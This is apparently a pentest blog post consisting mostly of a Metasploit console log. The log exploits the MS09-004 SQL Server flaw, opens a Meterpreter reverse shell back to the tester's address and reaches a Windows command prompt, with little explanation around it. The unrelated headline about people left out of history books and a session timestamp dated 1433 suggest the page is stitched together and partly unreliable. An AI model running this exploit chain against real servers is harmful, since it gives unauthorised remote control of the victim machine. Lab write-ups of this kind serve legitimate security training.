10,523 Important People Who Were Screwed Out of History Books ….

msf exploit(ms09_004_sp_replwritetovarbin) > use exploit/windows/mssql/ms09_004_sp_replwritetovarbin

msf exploit(ms09_004_sp_replwritetovarbin) > set lhost Tester-IP-Address

msf exploit(ms09_004_sp_replwritetovarbin) > set rhost Client-IP-Address

msf exploit(ms09_004_sp_replwritetovarbin) > exploit

[*] Started reverse handler on Tester-IP-Address:4444
[*] Attempting automatic target detection…
[*] Automatically detected target “MSSQL 2005 SP0 (9.00.1399.06)”
[*] Redirecting flow to 0x10e860f via call to our faked vtable ptr @ 0x2201ca8
[*] Sending stage (752128 bytes) to Client-IP-Address
[*] Meterpreter session 2 opened (Tester-IP-Address:4444 -> Client-IP-Address:1053) at 1433-02-01 12:26:12 +0100

meterpreter > shell
Process 2324 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

http://www.myexploit.wordpress.com/mock-pentest-one/

#MyExploitHQ

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s